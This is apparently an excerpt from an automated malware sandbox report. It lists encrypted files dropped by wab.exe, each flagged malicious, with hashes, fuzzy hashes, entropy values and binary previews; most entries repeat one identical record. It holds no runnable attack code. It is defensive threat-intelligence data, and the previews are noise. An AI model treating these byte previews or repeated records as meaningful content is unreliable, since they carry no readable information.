                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):171704
                                                                                Entropy (8bit):7.998920247515516
                                                                                Encrypted:true
                                                                                SSDEEP:3072:dBQvQ/7Ou4kkNxR5Bqr6T9/KnD7pIBLQyOJ2M0iDDEA:dBdp4kexR5Q+T909oL+0i3J
                                                                                MD5:5B25BFC17B48A67C34A54267A1DEF1E6
                                                                                SHA1:34A9688A193E13B3FA4EE81CBECA1A60BF9038C9
                                                                                SHA-256:98AAE7977CF4FE3FB81F71BAB3EA733D5F97174E21B0D98C96A3063AE691F598
                                                                                SHA-512:2A6CF98AE4AFDBD35FEEFD11A823725FAABEBDA00DB8DFE3E720E2BBEE7FE8629E651BF754A013935FA1EC44B7DFC5B857F8A6D4460C84DAD00DF881F63AAF53
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):174141
                                                                                Entropy (8bit):7.9990084611570005
                                                                                Encrypted:true
                                                                                SSDEEP:3072:qYkAxLdbGyY2ihg2KTO0ttUIJz7WVg4yGxODBr3FXXl0g3FtlTN1nzR:qYb1JPecOQErjwNFnl0ANNR
                                                                                MD5:F60AF193BC31E661AEF665132458FBF1
                                                                                SHA1:9247885D9E9153A5D3531A3F8F52E62FB69A1B2D
                                                                                SHA-256:4DCEE813494EB3E0ADF708BE273DAE37757CF40BA82A93548B39F9501C6D4634
                                                                                SHA-512:346932A3898441B6A851483313C582EC9A1903E6D7B9B4ACD8E3D4AE0934C04C1033FFCAF59526DB93D762B88AB3754921B42192E3DE4D50DFD180857D7EEC64
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
